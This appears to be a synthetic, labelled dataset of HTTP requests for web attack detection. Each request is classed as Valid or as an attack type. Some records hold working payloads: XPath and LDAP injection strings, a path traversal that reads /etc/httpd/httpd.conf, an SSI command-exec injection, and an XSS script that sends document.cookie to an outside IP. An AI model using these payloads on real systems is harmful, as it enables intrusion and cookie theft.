If-Range: Thu, 15 Oct 09 12:01:11 CET
Max-Forwards: 1
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic Y0FCdDpib3Ru
Authorization: st4wu hnr0r=yuise
Range: -4,-862
Referer: /1hrltsnz.avi
TE: deflate;q=0.7,gzip;q=0.7
Trailer: Cache-Control
User-Agent: Mozilla/8.3 (Machintosh; U; Mac OS X 4.9; le-L1; rv:4.5.9) Gecko/69541784
UA-CPU: PowerPC
UA-Disp: 423,7753,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 540x2072
Via: HTTP/9.1 195.83.10.113
Transfer-Encoding: identity
Upgrade: reCgm/1.9
Warning: 075 www.tgj5brs.htm "nOEloag30nqnokrne7lo" 
X-Forwarded-For: 99.24.216.147
X-Serial-Number: 995299594
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31797
Start - Id: 9688
class: Valid
GET /aH/tt39AaiO/BIUg/eQ8gh7dP-3ZE8B530/abyVISwiQSG/ie80netutJrthhix/jFO/mailhS/lliifalhsefMs/me/t5KaZvx/ehlR.js?CwsnmnelmOoed5i=851066768&9efgd5cmu=24671880&7CihdteI5ei=4174304&Rz2cmtVbypl2ntp=idweuxoiedR&Eed=2245458&hq7=7as&w4l=arlt HTTP/1.0
Host: 231.178.126.211
Connection: nwrd
Accept: */*;q=0.3
Accept-Charset: iso-2022-jp, x-mac-cyrillic, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: Io8-t;q=0.8, rwnar-etEuoevo;q=0.4
Cache-Control: min-fresh=15
Client-ip: 91.244.100.7
Cookie: Ynccrciwdc=30289;eto=a.7
Cookie2: $Version="0"
Date: Sat, 21 Mar 09 10:14:14 GMT
ETag: W/"0fKvY5bTDF@W2VXy8Rn"
Expect: a6ne2bi=lomue
From: ueOaee@eeftsat.ch
If-Modified-Since: Thu, 10 Apr 08 14:30:23 GMT
If-Unmodified-Since: Fri, 20 Oct 06 18:07:19 CET
If-Match: "51VodH_HSCgZ9kg3fCkP"
If-None-Match: "OQP4@JMqQDEDRpV"
If-Range: *
Max-Forwards: 5
MIME-Version: 6.8
Pragma: rLy=f7IoeO9r
Proxy-Authorization: Basic ZXRyYWhybzQ6cGc0MGVmZQ==
Authorization: egie etel0rns=5ieeuron
Range: -03,46238-,778-
Referer: http://www.mpchr.it/rAkVs/o0eo.cgi
TE: trailers,chunked
Trailer: Accept
User-Agent: dgerwfcinn (r9VjPTjnK; yCZVbcJ; nZLZYoKqg; hXv3NR; oy.92S.L)
UA-CPU: x86
UA-Disp: 229,8929,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 669x055
Via: 9.5 www.freiiH.htm, FTP/6.5 51.29.29.168, 9.2 www.olBu.png
Transfer-Encoding: ec8iT; hrgfs=insi
Upgrade: td7l/3.2, eIl/8.1, toa/8.7
Warning: 376 www.wu1w.htm:846 "serteri" "Tue, 11 Dec 07 19:12:50 GMT"
X-Forwarded-For: 48.192.127.27
X-Serial-Number: 66630290652
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9688
Start - Id: 31388
class: Valid
GET /ezeeanhsm/ariycbEueSTnh/idynimTtelarscinhc/iSEGi-6s0THs74huQ/efUO/xxaiahor5Nd1es4/CL9HbxxH/cXt914wHSFFvs/IBBs.mOEjF/oy1.gif?ooigsnfnljAerNd=b8nodeegn08deI%7Ei&n6tnntdoau=AazEoea5aimrurbd&edei=ucro&vidnha7joRkrceh=d+Kai7ajeexmle&rsaF=eir HTTP/1.1
Host: 254.56.63.125
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: apoae-u, rasgyauc-tmugtoh, ar-snmsuB, gjwi2y0t-n1wi, Deeatnxi-oq
Cache-Control: no-store
Client-ip: 248.191.216.133
Cookie: goEMhRx=gE;lwl=u n
Cookie2: $Version="970"
Date: Wed, 30 Jun 04 10:40:05 CET
ETag: W/"ogu5MqMSWXfdu5Wk"
Expect: ddos3
From: Tzeuatea@eoges.de
If-Modified-Since: Tue, 17 Oct 06 17:43:52 UTC
If-Unmodified-Since: Wed, 12 Sep 07 08:23:37 UTC
If-Match: "Mow4e_MnJVbf9iRWHpJv"
If-None-Match: "ROqSUmhke6LfzrWCfW"
If-Range: *
Max-Forwards: 4417
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: NTLM cnRobWJNaGVoaXJQb25zczFGc25hM2VuYW9zc2RPbGVkb3NubHRpYVRkTm8=
Authorization: Basic ZWdoZWNBaDphaW5ucmplOQ==
Range: 214-,6423-,-75701
Referer: /1rRbrxe/sEcl.tar.gz
TE: trailers,chunked;q=0.8
Trailer: Pragma
User-Agent: rhaawa/5.5.0.9
UA-CPU: StrongARM
UA-Disp: 6015,3763,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2355x254
Via: 5.7 242.113.197.193, 0fzt/7.6 174.187.184.79
Transfer-Encoding: beib; ruis=czhrLit
Upgrade: ruexiD/5.5
Warning: 388 www.tfrat7d.jpeg:096 "hrsa7mrlleyurua" "Tue, 09 Mar 10 03:42:13 CET"
X-Forwarded-For: 122.12.60.197
X-Serial-Number: 662905133581730649
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31388
Start - Id: 49006
class: XPathInjection
GET /yCh2-CJGtWc.9/i7gLdatOnzta5/usIYobKKsSLwg8Wo/enc7fU-1divaE53/nsc.dll?Onou=n%2Flnn%2FpEsi%2Fchild%3A%3Anode%28%29%5B+position%28%29%3D897%5D+++++%7C+Oriaic%2Ft%2FerALa%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D1%5D++++or++++%27qaa%27+++%3D++%27&nirorlwtksn=2546217 HTTP/1.0
Host: 3.182.5.193:37902
Connection: keep-alive
Accept: video/*, text/*;q=0.5, audio/*
Accept-Charset: shift_jis;q=0.8, iso-8859-6;q=0.6, x-mac-cyrillic, x-mac-korean;q=0.0, shift_jis
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 183.47.188.228
Cookie: 6noamn=s
Cookie2: $Version="6"
Date: Sat, 09 Sep 06 06:22:54 CET
ETag: "FA_sGMcegLbQEav"
Expect: 100-continue
From: w6wr@nytn.it
If-Modified-Since: Thu, 23 Apr 09 18:17:43 UTC
If-Unmodified-Since: Sun, 15 Jun 08 20:46:07 CET
If-Match: *
If-None-Match: "p-GEtbl5TnHD9-w"
If-Range: "iZm_0vun_wVTYBE"
Max-Forwards: 1
MIME-Version: 9.3
Pragma: nnUinih1=J6r1ota
Proxy-Authorization: Digest nc=2FF0fE2f
Authorization: NTLM bGh1aGlsaWRyMkk3c25uWm56MW10RWV0cmFubzBkb2VTdmIwYWtpd3Jlb2F0ZQ==
Range: -520,420265-,87-062067
Referer: /nmgaey/ihmA/yiiua0/ris7ob/lma5tldh.cgi
TE: deflate,chunked
Trailer: Accept
User-Agent: Mozilla/2.2 (Machintosh; U; Mac OS X 7.7; 3o-rn; rv:2.8.5) Gecko/21131740
UA-CPU: 68000
UA-Disp: 787,994,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 4233x4601
Via: 5.0 www.eRbhwep.jpeg:52166
Transfer-Encoding: gzip
Upgrade: meeoe/8.2, nir2fe/4.3, eS7e/1.8, nerHu/7.3
Warning: 893 www.orci.jpg "9g1en4itrrimothb4" 
X-Forwarded-For: 85.135.62.221
X-Serial-Number: 544350626543951868
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49006
Start - Id: 46086
class: PathTransversal
PUT /MeurmNdeieawiG7engm/tnbnoee0Aek/ls4objectZDhoRXymochag@bw/ellVegxhsOa82R.WTh@/oxFBQCI-9YTb/tyT_JNIYHj.Nl/tk0I26/ilZK8jw/urmhfr1add0y8o2swntu.css? HTTP/1.1
Content-Length: 214
Content-Language: drooul,cdel,hmtG0rI
Content-Encoding: compress
Content-Location: http://ecgvc.net/6ngsl5/srwlctid/nsokoO/rrqlytcq.php3
Content-MD5: dGVvZWhTeWl0cjl2aG90bg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 03 Jan 04 17:00:10 CET
Last-Modified: Wed, 20 May 09 03:46:04 CET
Host: www.ga8mnnceh.gov
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.1, compress;q=0.6, compress, deflate, gzip;q=0.7
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 242.237.108.67
Cookie: oesi=qI;nn=child;auhnsu=ftp\ioa8reycmPm%sdt[m@;ssib4soa=aq4t
Cookie2: $Version="065"
Date: Fri, 18 Jun 04 03:28:52 CET
ETag: W/"TbF8453pah_RFw4TC"
Expect: easElso=8jRolIq
If-Modified-Since: Wed, 13 Jun 07 03:37:29 CET
If-Unmodified-Since: Mon, 25 Jan 10 13:03:58 GMT
If-Match: *
If-None-Match: "GZlug9e0KKPhF418Mqe"
If-Range: *
Max-Forwards: 05
MIME-Version: 4.9
Pragma: kkpn=xniErhr
Proxy-Authorization: NTLM bm9qb29xc2tyZXBudGVzdGNzeWVuOW1mYXlUbWFlZXJuZXNsaWVkNGJpYW5zY3Jz
Authorization: Basic d250YW06ZE5zaA==
Referer: /8zIpllOr/ecrw/oept.pl
TE: trailers
User-Agent: Mozilla/8.1 (Machintosh; U; PPC Mac OS X 3.1; ea-1d; rv:9.4.6) Gecko/10089048
UA-CPU: x86
UA-Color: color8
UA-Pixels: 1090x096
Via: 2.8 171.97.130.37, FTP/2.7 www.naucs.gif
Transfer-Encoding: compress
X-Forwarded-For: 169.44.253.54
X-Serial-Number: 917856281137
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thqeptrnottgeso=8073&1ar=97676&ngi=drohr&nt9oz5=741639&o9bx=e.i-jtQ99&ifE3ntOqlyttedl=Wtattlj&pgS4=7aityovs&eh=%ocldeAnx&4eoOIegguiegam=98&5ahC=/etc/httpd/httpd.conf&xira8hTsm=hUEG&otrbale=92644&Ooz=6066035

End - Id: 46086
Start - Id: 10584
class: Valid
GET /hcioKdFrm4GC7_/uOnkbd2HQ1Nd/hm3itchearsn/mtitlenshfkked.html?husneydh=6rk7whereeucosbtad&bnmaC=masw&i0sEnsabf7sZ=58&eytcazo=mi&5veJF24ZCA=23367179&gs=rlCnapeha&7urEB=80141710&0MA@senWaccept1Y=-rle+ssuepmi&8ith=l8ntshseeflehe&BFZIlib=iK4tKdqWL&VhttpspROBdUG=u%28%3Cna&aaNgtaeseafg=6nN HTTP/1.0
Host: www.ftdyhopo.uk
Connection: close
Accept: */*;q=0.4
Accept-Charset: euc-tw;q=0.5, macintosh;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 245.176.39.251
Cookie: wLirfateed=mrCE2@m;bklfumE3lhehian=updatejlte0httpscopys;eiNniwsit=ohtaccesso;lygeyttochsw=re%d  ls bw+-eq 29;rntven=493831638;elhDDrDeou=200345
Cookie2: $Version="94"
Date: Sun, 29 Oct 06 03:59:11 GMT
ETag: W/"lOOiGyG8HGcYRzud"
Expect: raar
From: mohdrcal@8y7xh.de
If-Modified-Since: Wed, 15 Jun 05 17:55:06 GMT
If-Unmodified-Since: Sat, 20 Dec 08 15:05:15 CET
If-Match: "xk_BiZWMzF.Y9hsWwr"
If-None-Match: *
If-Range: *
Max-Forwards: 2776
MIME-Version: 8.8
Pragma: b=s
Proxy-Authorization: Basic dU9vZGF4bGg6ZE9nc3I=
Authorization: syes otesaxn=siewcre
Range: 13113-277,3-670,8449-3
Referer: /irsjt8i/3c5ddt/getzuoqa/HeSiili/yddf.swf
TE: gzip,deflate,trailers
Trailer: Authorization
User-Agent: cgQbCwLR http://www.rseeBn.biz
UA-CPU: x86
UA-Disp: 4066,570,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 170x2008
Via: lRhfe/1.5 www.tlpyfm.js, 1.1 180.206.182.12
Transfer-Encoding: deflate
Upgrade: Een/6.5, oelp/1.9, pepbl/8.4, hcTat/2.7, Uihj/0.1
Warning: 101 www.lSyoa.html "se09rYrre6" 
X-Forwarded-For: 109.176.189.188
X-Serial-Number: 340706
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10584
Start - Id: 39969
class: SSI
GET /ihmi5udotoer3ndtzf/rpjHYP5yB8MchSFXSpx3/aIB_lMNAesy_3OAOV/GX/r@7e/K7l_/rsoElrpltttdntui/aFn_P206cxhWa1g/y0ENri6G.sh?jxho7wodp=%3C%21+++%23%3C%21--+++%23exec+cmd%3D%22id%22--%3E&ako=tzV_MuLIVWg&cdharnanbEz=tann%7E%28ee+tn%28+emt%2Binull1 HTTP/1.0
Host: www.eveNgri8w.de
Connection: close
Accept: */*;q=0.6
Accept-Charset: windows-1258
Accept-Encoding: identity
Accept-Language: Looen-zet, n2woh-5e;q=0.6
Cache-Control: eapnaRso=eisoead7
Client-ip: 217.80.32.65
Cookie: xcWst1i=stodo8cd3n(s+2 an&;h5secnuuem=e 5sock_stream@eveuo$;5tooeesi=89;1Ou2NtnrhVm=zae1i4HeeasOso1mS;iulmu1oed=9ca4lobr;g01trhr7giE=aki0h
Cookie2: $Version="03"
Date: Mon, 15 Aug 05 22:40:52 CET
ETag: W/"AZnigfVHFs0zM56rr"
Expect: AItosemo=ysen
From: qaol9@aa3eqiae.fr
If-Modified-Since: Thu, 23 Jul 09 20:11:20 GMT
If-Unmodified-Since: Fri, 05 Jun 09 24:30:08 UTC
If-Match: *
If-None-Match: "BLUP6TPLW4CHNRW"
If-Range: "YavZqkjOeTOFp6nQ"
Max-Forwards: 889
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: aHtMee s2lgu=6eHelq
Authorization: Basic ZHJpdGpwdm86aXFmZWZj
Range: 67904-931063
Referer: http://xdto.cz/nhnntn/haeRTi6/kThrnal.txt
TE: trailers,trailers
Trailer: Date
User-Agent: Mozilla/0.7 (Machintosh; U; Mac OS X 4.8; of-me; rv:1.6.1) Gecko/40713168
UA-CPU: Sparc
UA-OS: Win9x
UA-Color: color16
Via: 0.8 133.88.95.175, HTTP/9.1 119.227.213.29:5539, FTP/1.9 50.234.198.92
Transfer-Encoding: identity
Upgrade: ebwzs/3.0, wtntaa/3.5, ds8jes/6.2, dad/1.0
Warning: 323 13.31.57.254 "dinvatrVko1snr" 
X-Serial-Number: 754321
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 39969
Start - Id: 35609
class: XPathInjection
GET /g-fxuFybetweenrksbin/e5ijsexU.exe?RBvsVYcmdaZD=948+++or+++++1%3C+++++e%2Fe%2Fn5qui%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D09%5D++++or++++3754%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&awldxtEtb7=eolsO3es%3E%27gyadminb&sGhlnDEijetHph=4zedEFjueuM&aIstaentAsjE=ceH&sdavw=42172&ttrhi=32996&iia0s6sreimqt=edN18HNFRwF&ehphanrfbtliecs=plAupdate5+ke HTTP/1.0
Host: www.outos6aet.fr
Connection: Wjzaal
Accept: video/*;q=0.8
Accept-Charset: cp-950;q=0.5, x-mac-chinesesimp;q=0.2, koi8;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 143.119.239.58
Cookie: Ge1lsirryhd=:]i
Cookie2: $Version="2"
Date: Thu, 28 Jun 07 21:41:37 CET
ETag: "yveLgmdxNwRjS_so3"
Expect: 100-continue
From: oiekA@q3dEy.org
If-Modified-Since: Sun, 30 Apr 06 07:14:43 UTC
If-Unmodified-Since: Mon, 27 Jun 05 18:38:15 CET
If-Match: "aHh0MEo-Lyaxyr0I"
If-None-Match: *
If-Range: "lSwtF.1qvgM1kNqUu"
Max-Forwards: 72
MIME-Version: 4.8
Pragma: o=nq1rfn
Proxy-Authorization: eNmRc aseer=gr3Gfc90
Authorization: NTLM Y0luYW5SM25pTmhtdHl1dGI1b3NzZmFobGxvYXhuYXJhaUk5dGVy
Range: 1278-6
Referer: /omhioe1v/teItwa1d/oidhcKse.sh
TE: trailers
Trailer: Host
User-Agent: Mozilla/5.6 (compatible; MSIE 5.9; Mac OS X; Aral9s; ddAPTe)
UA-CPU: x86
UA-Disp: 458,730,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 138x439
Via: wewfe/9.6 193.250.49.61
Transfer-Encoding: compress
Upgrade: tetnr/7.4, fcN/6.9, rTt/7.4, smennp/6.7, mvsass/6.7
Warning: 642 225.30.125.246 "ai7adc" 
X-Forwarded-For: 28.16.209.118
X-Serial-Number: 65275952070459353
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35609
Start - Id: 17214
class: Valid
GET /ws4kersenNhgft/HJ@v8sjPE2K/wsiEniooe4dsojetyil/hrsdTgv5wsenv3rAM2f/sthoa2iEgee7a7.tiff?aa0fTDTint=0htemtaqkTge&AecvT4kqont7t3u=rhosfsteLft&uIxewata=d+e&xinwp3tie=aj9gK&Fhome@bC@tmpbnz=90 HTTP/1.1
Host: www.aeag2hii.de
Connection: close
Accept: text/*;q=0.2, text/*
Accept-Charset: utf-8;q=0.9, euc-cn
Accept-Encoding: deflate;q=0.8, compress;q=0.8, deflate, gzip, compress;q=0.7
Accept-Language: cipEtibi-trthjtt;q=0.6, ebt63e-g, huud-egIiw
Cache-Control: no-transform
Client-ip: 106.60.218.207
Cookie: wTaaZbfcti7=eWMsnqy7G
Cookie2: $Version="5"
Date: Wed, 23 Mar 05 04:34:42 CET
ETag: "VnVj3T3gmtLTjcIn"
Expect: 100-continue
From: esabrd@aecmV.uk
If-Modified-Since: Tue, 23 Sep 08 14:54:00 UTC
If-Unmodified-Since: Mon, 25 Aug 08 18:35:22 GMT
If-Match: *
If-None-Match: "dXms_3YWWDB1E54"
If-Range: Sat, 18 Nov 06 15:32:03 CET
Max-Forwards: 6
MIME-Version: 6.9
Pragma: d=TlS
Proxy-Authorization: dRini wnbheet=snah
Authorization: NTLM dHNhdGs4Y2dheWVoNm5ORWVpaG5JZ2VhbnNoYWFlZWRzZWViZWUwcjlu
Range: -188059,160660-4,9392-
Referer: /eiwh8ee/tcss/easb/e3dr.txt
TE: gzip;q=0.2
Trailer: Max-Forwards
User-Agent: Mozilla/8.4 (Windows; U; Win 9x 5.1; oF-sz; rv:3.0.7) Gecko/70348676
UA-CPU: 68000
UA-Disp: 121,6829,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 4168x797
Via: 5.5 149.161.227.241, 4beoti/1.7 www.theYrov.tiff:578, 9.0 www.G6cheiA.gif
Transfer-Encoding: deflate
Upgrade: ezft/4.3, hgob/9.9, uqy1/8.3, lh5t/1.6, Das8c/2.5
Warning: 190 www.aefddvq.jpeg "twaMeths2eixnld" "Thu, 30 Jul 09 01:31:53 GMT"
X-Forwarded-For: 84.87.70.49
X-Serial-Number: 80895113
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17214
Start - Id: 8576
class: Valid
GET /PVsmochaYm-VZQP.jpg?iS2eh0eD=anm&rireocdy=5&bNQte=379485&raautim=lrvZlaZ7.n&rsagnehnNrnh=t%3B&rcp9nYposition=dsoir%29+%5B4oe%7E%5D3Nhu&dugeevteiqifeb=caM&ipswQgitm=%5Cwne5&nnTwedE=O&si41o1a7deMth=1 HTTP/1.1
Host: 7.20.146.71:80
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ntaTeel-poabs1ev;q=0.9, brelE0-lieetrmt
Cache-Control: no-store
Client-ip: 184.148.73.237
Cookie: lRXMv5gf=u a;EE_@1FTopen=ok?hho]r  @wlikewsoupdateunion+l;ndi8=55558
Cookie2: $Version="69"
Date: Thu, 26 Jul 07 20:54:30 GMT
ETag: "gfuWVs.92eY_wOm"
Expect: iIeea=hhls;evsai
From: 7tult@ty9u7Ower.com
If-Modified-Since: Sat, 31 Dec 05 19:38:44 CET
If-Unmodified-Since: Sat, 04 Oct 08 06:44:10 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 2.6
Pragma: di=u
Proxy-Authorization: NTLM RWUxYWVxcnJzaWt3ZWxzZHVpZW1kZXJzaW00bWZyenNpcmxpbWVpOWY2Ug==
Authorization: ijrl Setsp3ed=exeO5bti
Range: -281,776-17139
Referer: http://snSaD5au.uk/essw/nhoshe.mdb
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/5.6 (compatible; hkucp5Owxt; Win 9x; pliR7ar; ysed)
UA-CPU: Sparc
UA-Disp: 5974,9277,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 783x6311
Via: 1.4 www.rdoeaew.htm, HTTP/9.3 27.221.106.19
Transfer-Encoding: gzip
Upgrade: r85mm/0.1
Warning: 294 www.tpriIw.html "evdBEd" 
X-Forwarded-For: 154.87.255.117
X-Serial-Number: 1101244
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 8576
Start - Id: 37830
class: LdapInjection
GET /s-/ebnstlhe99cdaSsougn4/6Z2I0nEL6Tmsd/ntvc6eweaIf8dCsjrA/ePb2FxknT5ibk5tQ/S7c/777DO_-r@LSRj35xpz.dll?vei2oXdq=etfedsztu%40wd&ahqn0yis=jaad%29%28%26%28objectClass++%3D++++Eme1*%29 HTTP/1.1
Host: www.soneac3L.fr:80
Connection: e8anafI
Accept: application/*;q=0.2, text/*;q=0.8
Accept-Charset: euc-cn;q=0.3, iso-2022-jp;q=0.4, cp-936
Accept-Encoding: 
Accept-Language: eo-tlgA;q=0.5
Cache-Control: max-stale=3
Client-ip: 188.10.213.160
Cookie: rs=830630;Sintm7ureatte8u=oaa3XE42s;codrhlanoTo=ni1TbjWrnte
Cookie2: $Version="53"
Date: Tue, 25 Mar 08 17:41:28 CET
ETag: W/"7bZNocxT.N2HZG9O"
Expect: 100-continue
From: utTT@sw41.ch
If-Modified-Since: Tue, 15 May 07 07:37:27 CET
If-Unmodified-Since: Mon, 24 Aug 09 06:15:06 CET
If-Match: "NicbM4cEVa4yWhGT"
If-None-Match: *
If-Range: "EMJqZO.82YVLxrXaLI"
Max-Forwards: 14
MIME-Version: 6.6
Pragma: igernt='u'
Proxy-Authorization: Basic MWU3Ym9hOmx0ZWllam8=
Authorization: NTLM eXR5NXVlbHFzZU5vd3luUkVpdHJpZW1kZU9rZHplZXl3c3o1Z2d0b2l0aUQxbg==
Range: 09106-2,27777-,7807-
Referer: http://b3dajsnh.it/s6e1eI/aexdyh/aEt7T/tWeasp5n.jpg
TE: deflate,trailers,deflate
Trailer: Accept
User-Agent: 6ectae7rwtt3wnu
UA-CPU: 68000
UA-Disp: 780,4386,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: 8.5 219.117.54.210, 4.0 214.42.120.171
Transfer-Encoding: identity
Upgrade: msdjj/6.3, nhneNR/6.0, amsilt/6.3
Warning: 166 78.105.41.24 "sewleo7lheo" "Tue, 16 Jun 09 20:36:56 UTC"
X-Forwarded-For: 178.127.38.107
X-Serial-Number: 839362517955093673
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37830
Start - Id: 47093
class: XSS
GET /rmRuRTNteesh/r3Wb32uiJHSq9xIb/imesn/98.-bfwdIqCP4B6RD6/src7/h9wznoidiepyAt/Lktq/_j@2@/IKs/tj-Njs95E@Du4vc.jpg?aUZWJIz0=%3Cstyle%3E%3C%21--%3C%2Fstyle+%3E%3Cscript++%3E%5Bwindow.open%28%27http%3A%2F%2F223.145.14.11%2Fet.mdb%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript++%3E HTTP/1.1
Host: 84.105.239.162
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 51.141.13.228
Cookie: aS7z9=r(oeaiametaR v?ueyid 
Cookie2: $Version="4"
Date: Wed, 11 Nov 09 10:17:56 CET
ETag: "NVqARtN0JGV.Ro_eNoEv"
Expect: 100-continue
From: he45tlh@5ely.uk
If-Modified-Since: Wed, 16 Jun 04 06:03:19 CET
If-Unmodified-Since: Fri, 27 May 05 16:02:39 CET
If-Match: "Bcuz.ZJ-ImHOFYSf"
If-None-Match: "V9.i.iQXnMQ7R7p"
If-Range: Mon, 06 Nov 06 18:40:39 UTC
Max-Forwards: 8656
MIME-Version: 9.8
Pragma: hrb7E='6H0irea'
Proxy-Authorization: aos2 yryvu=gt6dn
Authorization: Basic YWVkZWYzOm5laGFldA==
Range: 74-7756,9-
Referer: /eRt2/edpr0a9e/ntn9nb.nsf
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/2.6 (Machintosh; U; Mac OS X 3.1; th-o8; rv:1.7.7) Gecko/51346392
UA-CPU: Sparc
UA-Disp: 016,6175,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 320x898
Via: FTP/2.4 106.167.146.32:2071
Transfer-Encoding: deflate
Upgrade: mwcnt/9.8, Dizwoq/2.8, rtnuoa/0.5
Warning: 246 www.ARdz.htm "saetdtrt" 
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 60697232
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47093
Start - Id: 31260
class: Valid
GET /e7/eaoiMhebzdtDij9s/XtqUHKJz/bnfmymttbnrd/nire62tcueAjiwem26o/e_XO/oeAmerO3Le/9laqsnst1esr9mu1asC/z8Sceqdom/tUxToW84FL2m/1tni2twbjh/dufdoeha5nchrura.asp?cci5fti4n=%3Doxtermp0%3B&cy=ah1i%26enui+aa%28binE4&oap8e=21&pWCgAXiUB=tomfjk5dsaytg1h&X1-VVFRinputHn0x=as2zsauE7n5services%5C&tgupztcyAaqadr=04336&iqAant9eVorlch=HlTtptosbsN&as9ejiud=3354915&rcha=ta%2Fer%26dwt%2Fmps%3Anbdocument%7E9d&Nvar=h HTTP/1.0
Host: 133.136.50.139
Connection: edEnen5
Accept: */*;q=0.6
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.9
Accept-Language: 2Ossek-eest9ii, at4a3rhl-Htt, st-Ith;q=0.4, iiTeeZes-ns;q=0.4, iv-a;q=0.6
Cache-Control: no-store
Client-ip: 162.208.165.198
Cookie: sdegh=59esdneyxFaue
Cookie2: $Version="94"
Date: Mon, 05 Apr 10 06:06:06 CET
ETag: W/"bPlt6P5ycBWrwMkF1C5U"
Expect: 100-continue
From: mzwlem@n1nsea.org
If-Modified-Since: Sat, 17 Nov 07 17:25:32 GMT
If-Unmodified-Since: Thu, 04 Mar 04 22:57:49 CET
If-Match: "0GB4VU899.lH_KS8n3g5"
If-None-Match: *
If-Range: *
Max-Forwards: 0909
MIME-Version: 4.6
Pragma: b6txnrsn=y
Proxy-Authorization: Basic c2FhT2g6MHJPc2xlM3Q=
Authorization: Digest uri=/yTteCo/xsehf.css
Range: 019-,893-4434
Referer: /ttzdac/ensTtiEk/eeoz/nd7i/ihereee.php4
TE: gzip;q=0.8,deflate,deflate
Trailer: From
User-Agent: Mozilla/2.6 (X11; U; Solaris 1.3; da-ga; rv:1.4.8) Gecko/36855128
UA-CPU: 68000
UA-Disp: 097,2984,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 3795x126
Via: 8.8 www.alyb.png, FTP/5.1 www.mebp5mn.shtml, FTP/4.2 229.188.14.202
Transfer-Encoding: compress
Upgrade: vn4e/1.5, o4t/2.0, qsr1e/6.0, tmD/0.8
Warning: 160 www.s6Dl4nG.js:02 "wyNAeNlmsnn6" 
X-Forwarded-For: 231.214.129.29
X-Serial-Number: 65900782326
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31260
Start - Id: 34260
class: Valid
PUT /stduT/2sjw-l/fnshasrntcathhewurE/idVtroUsssmgnWi/Tz-AKwkr.exe? HTTP/1.0
Content-Length: 137
Content-Language: ElgMe
Content-Encoding: gzip
Content-Location: /qerl/fnE2on.txt
Content-MD5: T2E4ZXV3ZWVlaGFhdHVuZg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Jun 05 15:14:47 UTC
Last-Modified: Wed, 08 Apr 09 19:43:13 GMT
Host: 57.144.168.190
Connection: t3sat
Accept: text/*;q=0.2, video/quicktime
Accept-Charset: utf-8;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 203.243.153.73
Cookie: iilHbsesJh=nerN4uOS;rur=p5Ttislot=;dteo12=+y+htacces
Cookie2: $Version="47"
Date: Thu, 10 Jun 04 04:58:50 CET
ETag: W/"wraIMkdB4WhEjaXcNXf8"
Expect: 100-continue
From: uoRceh@bnhno.gov
If-Modified-Since: Sat, 17 Mar 07 02:39:24 UTC
If-Unmodified-Since: Fri, 01 Jan 10 08:14:20 UTC
If-Match: *
If-None-Match: *
If-Range: "JKO6PSm6uNFAysm"
Max-Forwards: 9030
MIME-Version: 4.2
Pragma: n23thi=t9l81v
Proxy-Authorization: Digest username="rtalafh1"
Authorization: NTLM cWl2b3Ryb2hhdGFzbXJzNWhvdmVjbGhkclRlcFF6ZXRlNjJudGVhc3pzc3c=
Range: -804943,968106-
Referer: /t5ano/kbErea/mihf.tar
